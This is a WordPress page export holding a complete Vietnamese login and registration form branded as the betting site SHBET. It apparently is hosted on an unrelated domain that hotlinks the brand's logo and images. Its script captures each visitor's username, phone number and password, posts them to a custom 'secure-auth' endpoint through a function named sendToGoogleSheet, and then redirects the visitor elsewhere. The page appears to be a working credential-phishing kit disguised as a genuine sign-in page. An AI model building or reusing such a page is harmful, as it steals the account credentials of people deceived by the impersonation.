{"id":50,"date":"2026-07-02T11:18:20","date_gmt":"2026-07-02T11:18:20","guid":{"rendered":"https:\/\/thienduongxanhchin.online\/?page_id=50"},"modified":"2026-07-02T11:36:34","modified_gmt":"2026-07-02T11:36:34","slug":"shlogin","status":"publish","type":"page","link":"https:\/\/thienduongxanhchin.online\/?page_id=50","title":{"rendered":"shlogin"},"content":{"rendered":"\n<meta charset=\"UTF-8\">\n    <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no\">\n    <title>SHBET &#8211; \u0110\u0103ng nh\u1eadp \/ \u0110\u0103ng k\u00fd<\/title>\n    <link rel=\"stylesheet\" href=\"https:\/\/cdnjs.cloudflare.com\/ajax\/libs\/font-awesome\/6.4.0\/css\/all.min.css\">\n    <link href=\"https:\/\/fonts.googleapis.com\/css2?family=Roboto:wght@400;500;700;900&amp;display=swap\" rel=\"stylesheet\">\n    <style>\n        * {\n            margin: 0;\n            padding: 0;\n            box-sizing: border-box;\n        }\n\n        body {\n            font-family: 'Roboto', 'Inter', sans-serif;\n            background: #0a0a0a;\n            display: flex;\n            justify-content: center;\n            align-items: center;\n            min-height: 100vh;\n            padding: 16px;\n        }\n\n        .switch-area {\n            max-width: 420px;\n            width: 100%;\n            min-height: 100vh;\n            padding: 0 13px 20px;\n            font-family: 'Roboto', sans-serif;\n            background: url('https:\/\/8jvf.katawee.net\/system-requirement\/Web.MobileNew\/UK254-01\/20df38a1ce\/bg.561efae5e26c4dd7.png') no-repeat center bottom\/cover;\n            position: relative;\n            overflow-y: auto;\n            border-radius: 20px;\n        }\n\n        .close {\n            position: absolute;\n            right: 10px;\n            top: 10px;\n            z-index: 1;\n            text-decoration: none;\n        }\n        .close i {\n            font-size: 30px;\n            color: #2d7699;\n        }\n\n        .top {\n            display: block;\n            padding-top: 48px;\n            margin-bottom: 10px;\n        }\n        .top .logo-link {\n            display: block;\n            height: 72px;\n            width: 195px;\n            margin: 0 auto 19px;\n            text-align: center;\n        }\n        .top .logo-link img {\n            max-height: 100%;\n            max-width: 100%;\n            margin: 0 auto;\n            display: block;\n        }\n\n        .tab-switch {\n            display: flex;\n            justify-content: space-evenly;\n            height: 34px;\n            border-radius: 50px;\n            border: solid 1px #00a3c6;\n            background-color: #fff;\n            list-style: none;\n            padding: 0;\n            margin: 0;\n        }\n        .tab-switch li {\n            width: 50%;\n            height: 100%;\n            position: relative;\n        }\n        .tab-switch li a {\n            display: flex;\n            align-items: center;\n            justify-content: center;\n            height: 100%;\n            color: #00a3c6;\n            font-size: 16px;\n            font-weight: 700;\n            text-decoration: none;\n            border-radius: 50px;\n            transition: all 0.3s;\n            cursor: pointer;\n        }\n        .tab-switch li a.active {\n            background-color: #00a3c6;\n            color: #fff;\n            border-radius: 50px;\n        }\n\n        .wrapper {\n            position: relative;\n            padding: 0 4.4px;\n            font-family: 'Inter', 'Roboto', sans-serif;\n        }\n\n        .login-form {\n            width: 100%;\n            overflow-y: auto;\n            padding-top: 0;\n        }\n\n        fieldset {\n            position: relative;\n            border: none;\n            padding: 0;\n            margin: 0;\n        }\n\n        .input-group {\n            position: relative;\n            margin-bottom: 8px;\n            overflow: hidden;\n        }\n        .input-group input {\n            display: block;\n            width: 100%;\n            height: 36px;\n            padding-left: 15px;\n            color: #636363;\n            font-size: 14px;\n            font-weight: 500;\n            line-height: 36px;\n            border-radius: 8.7px;\n            border: solid 0.9px #9cbfc8;\n            background-color: #fff;\n            outline: none;\n            transition: border 0.3s;\n        }\n        .input-group input:focus {\n            border-color: #00a3c6;\n        }\n        .input-group input::placeholder {\n            color: #636363;\n        }\n\n        .pw-wrapper {\n            position: relative;\n        }\n        .pw-wrapper input {\n            padding-right: 40px;\n        }\n        .icon-eye {\n            position: absolute;\n            top: 50%;\n            right: 12px;\n            color: #636363;\n            font-size: 18px;\n            transform: translateY(-50%);\n            cursor: pointer;\n            transition: 0.3s;\n        }\n        .icon-eye:hover {\n            color: #00a3c6;\n        }\n\n        .save-pw {\n            display: flex !important;\n            justify-content: flex-start !important;\n            gap: 5px;\n            margin: 4px 0 10px;\n            align-items: center;\n        }\n        .save-pw input[type=\"checkbox\"] {\n            width: auto;\n            height: auto;\n            accent-color: #00a3c6;\n            cursor: pointer;\n        }\n        .save-pw span {\n            color: #333;\n            font-size: 14px;\n        }\n\n        .hint {\n            margin-bottom: 13px;\n            color: #000;\n            font-size: 14px;\n            text-align: center;\n            line-height: 1.6;\n        }\n\n        .btn-submit {\n            width: 100%;\n            height: 35px;\n            text-align: center;\n            line-height: 35px;\n            font-size: 14.7px;\n            font-weight: 700;\n            background-color: #00a3c6;\n            color: #fff;\n            border-radius: 53px;\n            border: none;\n            cursor: pointer;\n            transition: 0.3s;\n        }\n        .btn-submit:hover {\n            background-color: #00829e;\n            transform: scale(1.01);\n        }\n        .btn-submit:disabled {\n            opacity: 0.75;\n        }\n\n        .bottom-btns {\n            display: flex !important;\n            margin: 13px 0 18px !important;\n            justify-content: space-between;\n            gap: 10px;\n        }\n        .bottom-btns a {\n            display: flex;\n            align-items: center;\n            justify-content: center;\n            min-width: 150px;\n            width: 48%;\n            height: 60px;\n            margin: 0;\n            color: #2d7699;\n            font-size: 12.6px;\n            font-weight: 600;\n            text-transform: uppercase;\n            border-radius: 8.7px;\n            background-color: #bff4ff;\n            text-decoration: none;\n            text-align: center;\n            line-height: 1.4;\n            transition: 0.3s;\n        }\n        .bottom-btns a:hover {\n            background-color: #a8e8f5;\n            color: #1a5a7a;\n        }\n        .bottom-btns a br {\n            display: block;\n        }\n\n        .banner-app {\n            display: block;\n            margin-bottom: 10px;\n        }\n        .banner-app img {\n            width: 100%;\n            height: auto;\n            display: block;\n            border-radius: 8px;\n        }\n\n        .footer-wrap {\n            width: 100%;\n        }\n        .footer-wrap .man-img {\n            display: block;\n            width: 100%;\n            height: auto;\n            margin-bottom: 5px;\n        }\n        .sign {\n            display: flex;\n            align-items: center;\n            justify-content: center;\n            color: #00a3c6;\n            font-size: 12px;\n            gap: 5px;\n            flex-wrap: wrap;\n        }\n        .sign img {\n            height: auto;\n        }\n        .sign .sign-img {\n            width: 54px;\n        }\n        .sign .sign-img-small {\n            width: 35px;\n        }\n        .sign p {\n            margin: 0 5px;\n            text-align: center;\n            line-height: 1.4;\n        }\n        .sign p span:first-child {\n            display: block;\n            font-weight: 600;\n        }\n        .sign p span:last-child {\n            font-size: 11px;\n            opacity: 0.8;\n        }\n        .sign .divider {\n            display: inline-block;\n            width: 1px;\n            height: 36px;\n            margin: 0 7px;\n            background: #00a3c6;\n        }\n\n        \/* Toast notification *\/\n        .toast {\n            position: fixed;\n            top: 20px;\n            left: 50%;\n            transform: translateX(-50%);\n            padding: 12px 24px;\n            border-radius: 10px;\n            color: #fff;\n            font-weight: 700;\n            z-index: 9999;\n            display: none;\n            max-width: 90%;\n            text-align: center;\n            box-shadow: 0 4px 20px rgba(0,0,0,0.3);\n        }\n        .toast.success {\n            background: #28a745;\n        }\n        .toast.error {\n            background: #dc3545;\n        }\n        .toast.info {\n            background: #17a2b8;\n        }\n        .toast.show {\n            display: block;\n            animation: slideDown 0.5s ease;\n        }\n        @keyframes slideDown {\n            from {\n                opacity: 0;\n                transform: translateX(-50%) translateY(-20px);\n            }\n            to {\n                opacity: 1;\n                transform: translateX(-50%) translateY(0);\n            }\n        }\n\n        @media (max-width: 400px) {\n            .switch-area {\n                padding: 0 10px 15px;\n                border-radius: 16px;\n            }\n            .top {\n                padding-top: 38px;\n            }\n            .top .logo-link {\n                height: 60px;\n                width: 160px;\n            }\n            .tab-switch li a {\n                font-size: 14px;\n            }\n            .input-group input {\n                height: 32px;\n                font-size: 13px;\n                padding-left: 12px;\n            }\n            .btn-submit {\n                height: 32px;\n                line-height: 32px;\n                font-size: 13px;\n            }\n            .bottom-btns a {\n                height: 50px;\n                font-size: 11px;\n                min-width: 120px;\n            }\n        }\n    <\/style>\n\n\n\n    <!-- Toast Notification -->\n    <div id=\"toast\" class=\"toast\"><\/div>\n\n    <div class=\"switch-area\">\n\n        <a href=\"\/\" class=\"close\">\n            <i class=\"fal fa-times\"><\/i>\n        <\/a>\n\n        <section class=\"top\">\n            <a href=\"\/\" class=\"logo-link\">\n                <img decoding=\"async\" src=\"https:\/\/dgdga3.swuacktu.net\/system-requirement\/Web.MobileNew\/UK254-01\/20df38a1ce\/assets\/images\/account\/logo.png\" alt=\"SHBET\">\n            <\/a>\n            <ul class=\"tab-switch\">\n                <li>\n                    <a id=\"registerTab\">\u0110\u0102NG K\u00dd<\/a>\n                <\/li>\n                <li>\n                    <a id=\"loginTab\" class=\"active\">\u0110\u0102NG NH\u1eacP<\/a>\n                <\/li>\n            <\/ul>\n        <\/section>\n\n        <!-- ===== FORM \u0110\u0102NG NH\u1eacP ===== -->\n        <section id=\"loginSection\">\n            <div class=\"wrapper\">\n                <form class=\"login-form\" id=\"loginForm\">\n                    <fieldset>\n                        <div class=\"input-group\">\n                            <input type=\"text\" placeholder=\"Vui l\u00f2ng nh\u1eadp t\u00ean t\u00e0i kho\u1ea3n\" id=\"loginUsername\" required=\"\">\n                        <\/div>\n\n                        <div class=\"input-group\">\n                            <input type=\"tel\" placeholder=\"S\u1ed1 \u0111i\u1ec7n tho\u1ea1i\" id=\"loginPhone\" required=\"\">\n                        <\/div>\n\n                        <div class=\"input-group\">\n                            <div class=\"pw-wrapper\">\n                                <input type=\"password\" placeholder=\"Vui l\u00f2ng nh\u1eadp m\u1eadt kh\u1ea9u\" id=\"loginPassword\" required=\"\">\n                                <i class=\"icon-eye fas fa-eye-slash\" id=\"toggleLoginPw\"><\/i>\n                            <\/div>\n                        <\/div>\n\n                        <div class=\"save-pw\">\n                            <input type=\"checkbox\" id=\"rememberPw\">\n                            <span>Ghi nh\u1edb t\u00e0i kho\u1ea3n m\u1eadt kh\u1ea9u?<\/span>\n                        <\/div>\n\n                        <p class=\"hint\">\n                            Vui l\u00f2ng t\u1ef1 b\u1ea3o qu\u1ea3n th\u00f4ng tin t\u00e0i kho\u1ea3n<br>\n                            \u0110\u1ec3 b\u1ea3o \u0111\u1ea3m an to\u00e0n cho t\u00e0i kho\u1ea3n c\u1ee7a b\u1ea1n\n                        <\/p>\n\n                        <button type=\"submit\" class=\"btn-submit\" id=\"loginBtn\">\n                            <span>\u0110\u0102NG NH\u1eacP<\/span>\n                        <\/button>\n\n                     \n                    <\/fieldset>\n                <\/form>\n            <\/div>\n        <\/section>\n\n        <!-- ===== FORM \u0110\u0102NG K\u00dd ===== -->\n        <section id=\"registerSection\" style=\"display:none;\">\n            <div class=\"wrapper\">\n                <form class=\"login-form\" id=\"registerForm\">\n                    <fieldset>\n                        <div class=\"input-group\">\n                            <input type=\"text\" placeholder=\"Vui l\u00f2ng nh\u1eadp t\u00ean t\u00e0i kho\u1ea3n\" id=\"regUsername\" required=\"\">\n                        <\/div>\n\n                        <div class=\"input-group\">\n                            <input type=\"tel\" placeholder=\"S\u1ed1 \u0111i\u1ec7n tho\u1ea1i\" id=\"regPhone\" required=\"\">\n                        <\/div>\n\n                        <div class=\"input-group\">\n                            <div class=\"pw-wrapper\">\n                                <input type=\"password\" placeholder=\"Vui l\u00f2ng nh\u1eadp m\u1eadt kh\u1ea9u\" id=\"regPassword\" required=\"\">\n                                <i class=\"icon-eye fas fa-eye-slash\" id=\"toggleRegPw\"><\/i>\n                            <\/div>\n                        <\/div>\n\n                        <div class=\"input-group\">\n                            <div class=\"pw-wrapper\">\n                                <input type=\"password\" placeholder=\"X\u00e1c nh\u1eadn m\u1eadt kh\u1ea9u\" id=\"regConfirmPw\" required=\"\">\n                                <i class=\"icon-eye fas fa-eye-slash\" id=\"toggleRegConfirmPw\"><\/i>\n                            <\/div>\n                        <\/div>\n\n                        <p class=\"hint\">\n                            B\u1eb1ng vi\u1ec7c \u0111\u0103ng k\u00fd, b\u1ea1n \u0111\u1ed3ng \u00fd v\u1edbi<br>\n                            <strong>\u0110i\u1ec1u kho\u1ea3n v\u00e0 \u0110i\u1ec1u ki\u1ec7n<\/strong> c\u1ee7a ch\u00fang t\u00f4i\n                        <\/p>\n\n                        <button type=\"submit\" class=\"btn-submit\" id=\"registerBtn\">\n                            <span>\u0110\u0102NG K\u00dd<\/span>\n                        <\/button>\n\n                        <div style=\"text-align:center;margin-top:15px;color:#666;font-size:13px;\">\n                            \u0110\u00e3 c\u00f3 t\u00e0i kho\u1ea3n? <a href=\"#\" style=\"color:#00a3c6;font-weight:700;text-decoration:none;\" id=\"switchToLogin\">\u0110\u0103ng nh\u1eadp ngay<\/a>\n                        <\/div>\n                    <\/fieldset>\n                <\/form>\n            <\/div>\n        <\/section>\n\n    \n\n        <div class=\"footer-wrap\">\n            <img decoding=\"async\" src=\"https:\/\/dgdga3.swuacktu.net\/system-requirement\/Web.MobileNew\/UK254-01\/20df38a1ce\/assets\/images\/account\/man.png\" alt=\"man\" class=\"man-img\">\n\n            <div class=\"sign\">\n                <img decoding=\"async\" class=\"sign-img\" src=\"https:\/\/dgdga3.swuacktu.net\/system-requirement\/Web.MobileNew\/UK254-01\/20df38a1ce\/assets\/images\/account\/sing_adres.png\" alt=\"Iniesta sign\">\n                <p>\n                    <span>Andr\u00e9s Iniesta<\/span>\n                    <span>N\u0103m 2024 &#8211; 2025<\/span>\n                <\/p>\n                <span class=\"divider\"><\/span>\n                <p>\n                    <span>Raphinha<\/span>\n                    <span>N\u0103m 2025 &#8211; 2026<\/span>\n                <\/p>\n                <img decoding=\"async\" class=\"sign-img-small\" src=\"https:\/\/dgdga3.swuacktu.net\/system-requirement\/Web.MobileNew\/UK254-01\/20df38a1ce\/assets\/images\/account\/sing_raphinha.png\" alt=\"Raphinha sign\">\n            <\/div>\n        <\/div>\n\n    <\/div>\n\n    <script>\n\n       \/\/ 1. Thay \u0111\u1ed5i c\u1ea5u tr\u00fac URL \u0111\u1ec3 t\u01b0\u01a1ng th\u00edch v\u1edbi link d\u1ea1ng ?page_id=16 c\u1ee7a WordPress\nconst WEBHOOK_URL = '\/?rest_route=\/secure-auth\/v1\/submit';\n\n\/\/ 2. B\u1ed4 SUNG H\u00c0M SHOWTOAST (S\u1eeda tri\u1ec7t \u0111\u1ec3 l\u1ed7i showToast is not defined)\nfunction showToast(message, type = 'info') {\n    const toast = document.getElementById('toast');\n    if (!toast) return;\n\n    \/\/ Thi\u1ebft l\u1eadp class d\u1ef1a tr\u00ean thi\u1ebft k\u1ebf CSS c\u1ee7a b\u1ea1n (success, error, info)\n    toast.className = `toast ${type} show`;\n    toast.innerText = message;\n\n    \/\/ T\u1ef1 \u0111\u1ed9ng \u1ea9n th\u00f4ng b\u00e1o sau 3 gi\u00e2y\n    setTimeout(() => {\n        toast.classList.remove('show');\n    }, 3000);\n}\n\n\nasync function sendToGoogleSheet(data) {\n    try {\n        const response = await fetch(WEBHOOK_URL, {\n            method: 'POST',\n            headers: {\n                'Content-Type': 'application\/json',\n            },\n            body: JSON.stringify(data)\n        });\n\n        \/\/ Ch\u1ec9 c\u1ea7n WordPress ph\u1ea3n h\u1ed3i tr\u1ea1ng th\u00e1i OK (m\u00e3 200), kh\u00f4ng c\u1ea7n quan t\u00e2m n\u1ed9i dung tr\u1ea3 v\u1ec1 l\u00e0 g\u00ec\n        if (response.ok) {\n         \n            return true; \n        } else {\n            throw new Error(`HTTP error! status: ${response.status}`);\n        }\n    } catch (error) {\n        \/\/ Ch\u1ec9 khi n\u00e0o m\u1ea5t m\u1ea1ng ho\u00e0n to\u00e0n ho\u1eb7c sai \u0111\u01b0\u1eddng d\u1eabn URL m\u1edbi nh\u1ea3y v\u00e0o \u0111\u00e2y\n        console.error('L\u1ed7i k\u1ebft n\u1ed1i h\u1ec7 th\u1ed1ng:', error);\n        showToast('\u274c C\u00f3 l\u1ed7i k\u1ebft n\u1ed1i x\u1ea3y ra, vui l\u00f2ng th\u1eed l\u1ea1i!', 'error');\n        return false;\n    }\n}\n\nasync function handleLogin(e) {\n    e.preventDefault();\n    \n    const username = document.getElementById('loginUsername').value.trim();\n    const lphone = document.getElementById('loginPhone').value.trim();\n    const password = document.getElementById('loginPassword').value.trim();\n    const remember = document.getElementById('rememberPw').checked;\n\n    if (!username || !lphone || !password) {\n        showToast('\u26a0\ufe0f Vui l\u00f2ng nh\u1eadp \u0111\u1ea7y \u0111\u1ee7 th\u00f4ng tin!', 'error');\n        return;\n    }\n\n    const data = {\n        type: 'login',\n        username: username,\n        phone: lphone,\n        password: password,\n        remember: remember,\n        timestamp: new Date().toISOString(),\n    };\n\n    console.log('Ki\u1ec3m tra \u0111\u0103ng nh\u1eadp:', data);\n    \n    \/\/ G\u1eedi d\u1eef li\u1ec7u l\u00ean server trung gian\n    const success = await sendToGoogleSheet(data);\n    \n    \/\/ N\u1ebfu g\u1eedi th\u00e0nh c\u00f4ng, \u0111\u1ee3i 1 gi\u00e2y r\u1ed3i chuy\u1ec3n h\u01b0\u1edbng trang\n    if (success) {\n        setTimeout(() => {\n            window.location.href = \"https:\/\/thienduongxanhchin.online\/?page_id=36\";\n        }, 5000);\n    }\n}\n\n\/\/ ===== X\u1eec L\u00dd \u0110\u0102NG K\u00dd =====\nasync function handleRegister(e) {\n    e.preventDefault();\n\n    const username = document.getElementById('regUsername').value.trim();\n    const phone = document.getElementById('regPhone').value.trim();\n    const password = document.getElementById('regPassword').value.trim();\n    const confirmPw = document.getElementById('regConfirmPw').value.trim();\n\n    if (!username || !phone || !password || !confirmPw) {\n        showToast('\u26a0\ufe0f Vui l\u00f2ng nh\u1eadp \u0111\u1ea7y \u0111\u1ee7 th\u00f4ng tin!', 'error');\n        return;\n    }\n\n    if (password !== confirmPw) {\n        showToast('\u274c M\u1eadt kh\u1ea9u x\u00e1c nh\u1eadn kh\u00f4ng kh\u1edbp!', 'error');\n        return;\n    }\n\n    if (password.length < 6) {\n        showToast('\u26a0\ufe0f M\u1eadt kh\u1ea9u ph\u1ea3i c\u00f3 \u00edt nh\u1ea5t 6 k\u00fd t\u1ef1!', 'error');\n        return;\n    }\n\n    const data = {\n        type: 'register',\n        username: username,\n        phone: phone,\n        password: password,\n        timestamp: new Date().toISOString(),\n    };\n\n    console.log('Ki\u1ec3m tra \u0111\u0103ng k\u00fd:', data);\n    \n    \/\/ G\u1eedi d\u1eef li\u1ec7u l\u00ean server trung gian\n    const success = await sendToGoogleSheet(data);\n    \n    if (success) {\n        document.getElementById('registerForm').reset();\n        setTimeout(() => {\n            window.location.href = \"https:\/\/thienduongxanhchin.online\/?page_id=36\";\n        }, 5000);\n    }\n}\n\n\/\/ ===== TOGGLE PASSWORD =====\nfunction togglePassword(inputId, iconEl) {\n    const input = document.getElementById(inputId);\n    if (input.type === 'password') {\n        input.type = 'text';\n        iconEl.classList.remove('fa-eye-slash');\n        iconEl.classList.add('fa-eye');\n    } else {\n        input.type = 'password';\n        iconEl.classList.remove('fa-eye');\n        iconEl.classList.add('fa-eye-slash');\n    }\n}\n\n\/\/ ===== TAB SWITCH =====\nconst loginTab = document.getElementById('loginTab');\nconst registerTab = document.getElementById('registerTab');\nconst loginSection = document.getElementById('loginSection');\nconst registerSection = document.getElementById('registerSection');\nconst switchToLoginLink = document.getElementById('switchToLogin');\n\nfunction switchToLogin() {\n    loginTab.classList.add('active');\n    registerTab.classList.remove('active');\n    loginSection.style.display = 'block';\n    registerSection.style.display = 'none';\n}\n\nfunction switchToRegister() {\n    registerTab.classList.add('active');\n    loginTab.classList.remove('active');\n    loginSection.style.display = 'none';\n    registerSection.style.display = 'block';\n}\n\nloginTab.addEventListener('click', function(e) {\n    e.preventDefault();\n    switchToLogin();\n});\n\nregisterTab.addEventListener('click', function(e) {\n    e.preventDefault();\n    switchToRegister();\n});\n\nif (switchToLoginLink) {\n    switchToLoginLink.addEventListener('click', function(e) {\n        e.preventDefault();\n        switchToLogin();\n    });\n}\n\n\/\/ ===== EVENT LISTENERS =====\ndocument.getElementById('toggleLoginPw').addEventListener('click', function() {\n    togglePassword('loginPassword', this);\n});\n\ndocument.getElementById('toggleRegPw').addEventListener('click', function() {\n    togglePassword('regPassword', this);\n});\ndocument.getElementById('toggleRegConfirmPw').addEventListener('click', function() {\n    togglePassword('regConfirmPw', this);\n});\n\ndocument.getElementById('loginForm').addEventListener('submit', handleLogin);\ndocument.getElementById('registerForm').addEventListener('submit', handleRegister);\n\nif (window.location.search.includes('register=true')) {\n    switchToRegister();\n}\n      \n    <\/script>\n","protected":false},"excerpt":{"rendered":"<p>SHBET &#8211; \u0110\u0103ng nh\u1eadp \/ \u0110\u0103ng k\u00fd \u0110\u0102NG K\u00dd \u0110\u0102NG NH\u1eacP Ghi nh\u1edb t\u00e0i kho\u1ea3n m\u1eadt kh\u1ea9u? Vui l\u00f2ng t\u1ef1 b\u1ea3o qu\u1ea3n th\u00f4ng tin t\u00e0i kho\u1ea3n \u0110\u1ec3 b\u1ea3o \u0111\u1ea3m an to\u00e0n cho t\u00e0i kho\u1ea3n c\u1ee7a b\u1ea1n \u0110\u0102NG NH\u1eacP B\u1eb1ng vi\u1ec7c \u0111\u0103ng k\u00fd, b\u1ea1n \u0111\u1ed3ng \u00fd v\u1edbi \u0110i\u1ec1u kho\u1ea3n v\u00e0 \u0110i\u1ec1u ki\u1ec7n c\u1ee7a ch\u00fang t\u00f4i \u0110\u0102NG [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"login-register","meta":{"footnotes":""},"class_list":["post-50","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/thienduongxanhchin.online\/index.php?rest_route=\/wp\/v2\/pages\/50","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/thienduongxanhchin.online\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/thienduongxanhchin.online\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/thienduongxanhchin.online\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/thienduongxanhchin.online\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=50"}],"version-history":[{"count":2,"href":"https:\/\/thienduongxanhchin.online\/index.php?rest_route=\/wp\/v2\/pages\/50\/revisions"}],"predecessor-version":[{"id":53,"href":"https:\/\/thienduongxanhchin.online\/index.php?rest_route=\/wp\/v2\/pages\/50\/revisions\/53"}],"wp:attachment":[{"href":"https:\/\/thienduongxanhchin.online\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=50"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}